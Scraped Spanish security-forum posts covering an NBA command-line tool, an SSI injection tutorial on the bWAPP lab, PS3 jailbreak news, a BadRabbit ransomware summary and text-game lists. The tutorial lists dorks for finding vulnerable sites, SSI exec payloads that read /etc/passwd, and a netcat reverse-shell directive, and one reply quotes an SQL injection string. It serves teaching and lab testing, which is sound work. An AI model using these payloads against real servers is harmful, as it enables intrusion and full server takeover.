Si os gusta usar la línea de comandos, y os gusta la NBA, no te puedes perder esta herramienta. Con You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login puedes ver los datos de partidos en vivo, estadísticas de equipos, información sobre jugadores, etc, y todo desde la terminal. La información la obtiene de la web oficial de la NBA You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, por lo que todos los datos son fiables.

Para que funcione correctamente, hay que asegurarse de que tenemos instalado Nodejs y NPM, si no los tenemos, podemos descargarlos e instalarlos fácilmente con los siguientes comandos:

• Descargar e instalar NODEjs
  

      git clone git://github.com/nodejs/node.git
  
      cd node
  
      make install
  
      cd ..



• Descargar e instalar NPM
  

  
      git clone git://github.com/npm/npm.git
  
      cd npm
  
      make install
  
      cd ../

Una vez tengamos los prerequisitos, hay que clonar su repositorio de Github:

git clone https://github.com/xxhomey19/nba-go.git

Y para instalar, basta con el siguiente comando:

npm install -g nba-go

---

Su uso es bastante sencillo, podemos elegir entre estadísticas de partidos o estadísticas de jugadores. El comando básico es sería el siguiente:

nba-go game

nba-go player <jugador>

Ofrece mucha más flexibilidad a la hora de mostra datos, podéis filtrar por fecha, finales, equipos... si queréis aprender más sobre esta tool, os dejo la guía oficial:

NBA-Go: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Un saludo, HATI

Nueva firma:



Si algún usuario quiere una firma personalizada puedo intentar sacarle algo de tiempo.

Usuarios con al menos 2 puntos de reputación y más de 50 post.

No es la máquina bWAPP, es solo la plataforma web. Ya te conteste por mp.

Se me escapó esa 
No estaba en mi lan, solo digo eso jaja

No estaba en mi lan.

Estos días he estado testeando una aplicación web de un cliente y me he encontrado con una vulnerabilidad que desconocía (seguro que para muchos será conocida). Se trata de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, y para saber bien de que se trata, primero hay que conocer que es una You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Cita de: Traducción - OWASP SSILas SSI son directivas presentes en las aplicaciones Web utilizadas para alimentar una página HTML con contenido dinámico. Son similares a los CGIs, excepto que los SSIs se utilizan para ejecutar algunas acciones antes de que se cargue la página actual o mientras se visualiza la página. Para ello, el servidor web analiza SSI antes de suministrar la página al usuario.

Las implementaciones comunes de SSI proporcionan comandos para incluir archivos externos, para establecer e imprimir variables de entorno CGI del servidor web, y para ejecutar scripts CGI externos o comandos de sistema.

Vamos a profundizar un poco y ver que se puede hacer con una directiva SSI, para comprender porqué es muy peligroso realizar una mala configuración de estas:

• 
  La sintáxis es la siguiente:
  

  <!--#function attribute=value attribute=value ... -->

  
  

• 
  Se pueden usar variables de entorno, por ejemplo, para obtener la hora:
  

  <!--#echo var="DATE_LOCAL" --> 

  
  

• 
  También se pueden incluir ficheros:
  

  <!--#include virtual="/footer.html" --> 

  
  

• 
  O incluso, y peligroso, ejecutar comandos:
  

  <pre>
  <!--#exec cmd="dir" -->
  </pre> 

  
  

• Es posible declarar variables y usar expresiones condicionales:
  

  <!--#set var="modified" value="$LAST_MODIFIED" -->
  
  
  Good <!--#if expr="%{TIME_HOUR} <12" -->
  morning!
  <!--#else -->
  afternoon!
  <!--#endif --> 

Los servidores más conocidos que soportan este tipo de directivas son Apache, Nginx, ISS, Lighthttpd y LiteSpeed, y generalmente se encuentran en archivos con extensión ".shtml", ".stm" o ".shtm", aunque no siempre es así.

Por lo tanto, la vulnerabilidad es básicamente una inyección de código que explota directivas SSI, y que, dependiendo de la configuración del servidor, puede conllevar, entre otros casos, a la ejecución de código arbitrario en el server, inclusión de archivos, ejecución de código javascript...

Fuetntes y más información:

- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Una vez explicado esto, podemos ir a la acción 

---

Para buscar aplicaciones vulnerables, podemos usar dorks, os dejo algunos de ejemplo, aunque se pueden crear más elaborados:

- inurl:bin/Cklb/
- inurl:login.shtml
- inurl:login.shtm
- inurl:login.stm
- inurl:search.shtml
- inurl:search.shtm
- inurl:search.stm
- inurl:forgot.shtml
- inurl:forgot.shtm
- inurl:forgot.stm
- inurl:register.shtml
- inurl:register.shtm
- inurl:register.stm
- inurl:login.shtml?page=

Por suerte, el entorno de pruebas You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login nos permite testear este tipo de ataques sin hacer daño a nadie. 

Para montar el lab, solo es necesario subir el contenido de bWAPP a un servidor con PHP y base de datos, podeís usar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Logino similar para hacer esto. Os dejo una guía por si alguien quiere detalles de la instalación:

• Instalación bWAPP: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Una vez tengamos todo el lab montado, hay que configurar un proxy para interceptar las peticiones, yo usaré You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Seleccionamos la opción correspondiente a SSI Injection y ya tenemos todo listo para comenzar.


En el supuesto de un escenario real, lo primero que debemos hacer para testear la vulnerabilidad sería validar los parámetros de entrada. Haciendo una petición con los caracteres que debe filtrar una directiva SSI lo comprobamos.

Caracteres: < ! # = / . " - > and [a-zA-Z0-9]




Se puede ver claramente que noha filtrado nada, ya que nos devuelve los valores introducidos.

A continuación, probemos con una variable de entorno para ver el resultado:

Variable de entorno: <!--#echo var="DATE_LOCAL" -->



La variable introducida contiene el valor de la fecha del sistema del servidor, lo que significa que podemos interactuar con él. Vamos a comprobar si tenemos acceso a datos sensibles cómo pueden ser los directorios /etc/passwd o /etc/shadow.

Directivas enviadas:

• <!--#exec cmd="whoami"-->
• <!--#exec cmd="cat /etc/passwd"-->

Por último, veamos cómo obtener una shell para tener total control del servidor. Para ello, tenemos que abrir una conexión con netcat, para luego enviar una directiva que indique al server la conexión.


Comando netcat:
[/list]

nc -nlvp -p 1337

Directiva: <!--#exec cmd="nc You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login 1337 -e /bin/bash"-->

Shell:


Espero que os haya gustado. Un saludo, HATI

La semana pasada se hablaba de que se iba a lanzar antes de Navidad un jailbreak para para PS3 que iba a permitir piratear una gran cantidad de consolas que tuviesen un firmware oficial 4.82 o anterior mediante la instalación de un Custom Firmware (CFW). Dicho y hecho, ahora ya está disponible la primera versión que puede instalarse desde el OFW 4.82 para poder ejecutar modificaciones y copias de juegos.


PS3Xploit: el pirateo vuelve a PS3

Hasta ahora era necesario comprar un Hardware Flasher como un E3 Flasher para hacer downgrade al firmware 3.55 (modelos de consola 25xx o anterior. Sin embargo, con con PS3Xploit se puede realizar todo el proceso a través de software sin tener que abrir la consola, y en tan sólo unos pocos minutos.

Lo que hace este proceso es, básicamente, parchear el CoreOS del chip NOR o NAND. Una vez instalado, cuando reiniciemos la consola podemos instalar el Custom Firmware, pasando directamente de un firmware oficial a uno personalizado. El proceso ha de realizarse desde el firmware oficial 4.82, ya que se flashea a una versión modificada de ese mismo 4.82.

Entre los modelos soportados encontramos todos los modelos de la PS3 Fat y los modelos de la Slim hasta 25xx que vinieran de serie con el firmware 3.56 o anterior. Los modelos SuperSlim y los modelos Slim 3xxx, 4xxx no son compatibles. Los modelos 2xxx que vinieran de serie con firmware 3.60 o superior tampoco son compatibles (consolas vendidas después de diciembre de 2010 más o menos). Según afirman sus creadores, las consolas Slim y SuperSlim que actualmente no son compatibles podrían serlo en los próximos meses.


PS3Xploit permite ejecutar copias de juegos

Con PS3Xploit y el CFW 4.82 instalado, los usuarios pueden realizar todo tipo de modificaciones en su consola. Por ejemplo, pueden ejecutar emuladores o copias de sus juegos. Si tienes una PlayStation 3 con el lector de discos roto, puedes copiar tus juegos a un disco duro o SSD externo para jugarlos.

Las instrucciones de instalación se encuentran en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, o también tenéis una You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Si lo hacéis corréis el riesgo de poder estropear vuestra consola. Además, si os conectáis a PSN incurrís en el riesgo de que os baneen la consola y vuestra cuenta, por lo que es conveniente que no os conectéis si lo instaláis.


Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¿Has seguido esta guía?

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Necesitas dos USBs para instalar Tails.

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, sí, el grupo de Whatsapp está activo, aunque completo. Ponte en contacto con @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login o You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para poder entrar.

Os dejo este framework, seguro que algunas de las mencionadas ya están ahí y que muchos lo conoceis, si no, ya es hora.

Muy recomendado:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Es posible, como tu dices @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, en modo monitor la tarjeta de red escucha todos los paquetes sin estar conectada a la red (el modo monitor conlleva que no te puedas conectar, ya que la tarjeta va cambiando de frecuencia para escuchar en todos los canales). No todas las tarjetas de red soportan este modo, y no hay que confundirlo con el modo promiscuo.

Corríjanme si me equivoco.

Ahí está la inyección hecha por Vega:

Cita de: Yustuz1%20AND%201=2%20--%20

Si quieres comprobar si es inyectable puedes hacerlo a mano desde el navegador, o pasarle un SQLmap a ese parámetro.

Prueba con esto, es vía terminal, pero con una interfaz muy amigable.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Algunos han despertado hoy reviviendo viejas pesadillas con el ransomware... los sistemas del Metro de Kiev, el aeropuerto de Odessa y varias organizaciones en Rusia confirmaban que sus sistemas informáticos se habían visto bloqueados debido a que los archivos del sistema operativo habían sido cifrados por un ransomware, esta vez el turno es del denominado BadRabbit.

La amenaza se extiende a otros países de Europa del Este: Alemania, Turquía, Bulgaria, Montenegro... conviene fijar la mirada a este nuevo y lucrativo malware, para lo que me quedo con la síntesis del repositorio deYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y las noticias que van surgiendo.

BadRabbit es un ransomware que es capaz de propagarse de forma local a través de SMB. Para llevar a cabo el proceso de infección utiliza ingeniería social, haciéndose pasar por un instalador de Adobe Flash Player. Una vez haya infectado la computadora inicial, intentará esparcirse a través de la red local utilizando una lista de nombres de usuario y contraseñas, por lo que resulta determinante utilizar un nombre de usuario y sobre todo una contraseña que no sean sencillas de adivinar. Como método de esparcimiento de momento se descarta la utilización de la vulnerabilidad de SMB utilizada por WannaCry y NotPetya.

Bad Rabbit no solo cifra los ficheros personales que encuentre utilizando claves RSA 2048, añadiéndoles la extensión .encrypted, sino que además también cifra el MBR del disco duro utilizando You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, una herramienta de cifrado completo de disco Open Source. Para el pago del rescate pide 0,05 bitcoins que se tienen que pagar mediante la red Tor.



Hasta ahora, es dirigido principalmente a Rusia y Ucrania, además de otros países (Alemania, Turquía, Bulgaria, Montenegro). Aunque parece que no se autopropaga a nivel mundial, podría dirigirse a objetivos seleccionados a propósito. Las mitigaciones son similares a las de Petya / NotPetya.


Infección inicial

Aparece como una actualización de flash falsa:



Es probable que las infecciones sean del tipo Watering-Hole/Drive-By, pero también pueden ser dirigidas selectivamente.
Lista de extensiones de archivo específicas

    Imagen Tweet: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    Texto: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Componentes y métodos:

Usa el binario legítimo y firmado de DiskCryptor para cifrar
Está casi confirmado que usa EternalBlue (o al menos activa controles que están a la espera de su uso)
Incorpora Mimikatz.
Da un mensaje de usuario "por favor apague el antivirus" en algunas circunstancias.
También se propaga a través de SMB y WebDAV,  autopropagandose localmente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Usa una lista de credenciales hardcodeadas:You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
C:\WINDOWS\cscc.dat == DiskCryptor (¿bloquea la ejecución para inocularse?)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
C:\Windows\infpub.dat == #BADRABBIT "pushed" lateralmente (¿bloquea la ejecución para inocularse?). Al parecer, crear una versión de solo lectura de este archivo    puede detener la infección:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Análisis del componente flash_install.php:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Video en acción: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Al parecer, borra los registros de Windows y el journal del sistema de archivos
¿También instala un keylogger?
¿Limpia el sector de arranque y pone kernel al final de la unidad?
Podría ser una variante de Diskcoder
Los C&C y los dominios del payload fueron instalados previamente con mucha antelación:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    El 13% del código es reusado de NotPetya
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
10 diferencias entre el código de Petya y el de BadRabbit:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Análisis interactivo de BadRabbit.exe:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Regla de Yara (creada por un ingeniero de McAfee)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Referencias de cultura contenidas
        Dragones de Game of Thrones (Drogon, Rhaegal)
        Película de hackers (al final de la lista de contraseñas hardcodeadas)



Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Tengo entendido que Delorean es la única manera efectiva.

Si alguien quiere información sobre este tipo de juegos, generalmente, los que son online con varios jugadores se denominan MUD (multi user domain / multi user dungeon).
Os dejo un enlace: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Y una lista con algunos en español:

• BastardMUD - Mud completamente en español, solo pk, inspirado en el manga de Bastard!
• Balzhur - Mud en español basado en Smaug
• Callandor Mud - Mud español basado en la Rueda del Tiempo de Robert Jordan, donde se da mucha importancia al ROL y a la interpretación de tu personaje.
• Medina MUD - Mud en Español con áreas en Español y Catalán, basado en Merk y Diku, se inició en 1995, reabierto para nostálgicos.
• Reinos de Leyenda - Mud español de última generación basado en el mundo de Eirea, estable desde 1996 y accesible para invidentes.
• CyberLife Mud: creado en 2017 y con temática actual.

Web que recoge la mayoría de los MUD activos (inglés):  You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Existen varios juegos como los que mencionas, sobre todo del estilo RPG.
Personalmente, creo que si la historia es buena, da igual el genero, los juegos de texto pueden ser mejores que muchos otros.


Por si alguno quiere echar un vistazo o coger ideas, os dejo el único que conozco en español, con una comunidad activa detrás y con gente online:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¿Con hacking mediante whatsapp a que te refieres?

¿A utilizar Whatsapp cómo vector de ataque o a vulnerablidades conocidas en Whatsapp?

No es humo, aquí tienes varios posts explicando en que consiste:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La tensión entre Estados Unidos y Rusia vive, en el último año, uno de los peores momentos desde el fin de la Guerra Fría, y parece que puede ir a peor. Hoy se ha conocido que hackers rusos habrían atacado a la NSA (Agencia Nacional de Seguridad) estadounidense robándoles algunos documentos altamente sensibles y secretos sobre la ciberseguridad del país.

Según publica el The Wall Street Journal, la violación, considerada la más grave de los últimos años, podría haber abierto una brecha en la ciberseguridad del país y permitido a los 'hackers' de Moscú adentrarse mucho más fácilmente en las redes estadounidenses. La información va más allá y apunta a que los atacantes, que trabajarían para el gobierno de Putin, se habrían hecho con documentos que explican toda la estrategia de seguridad de la NSA.

Aunque la noticia ha salido a la luz hoy, el ciberataque se habría efectuado en 2015, y las autoridades del país norteamericano lo habrían descubierto en la primavera de 2016. Esto significa que los piratas rusos habrían tenido hasta un año de ventaja para poder moverse con total libertad saltándose las líneas defensivas del enemigo sin demasiado problema.

En cuanto a lo robado no se sabe a ciencia cierta qué material se pudieron llevar los rusos. Fuentes consultadas por WSJ apuntan que entre ese material habría información sobre cómo trabaja la agencia cuando hay un ciberataque o qué medidas lleva a cabo para adentrarse en sistemas de otros países en misiones de espionaje.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login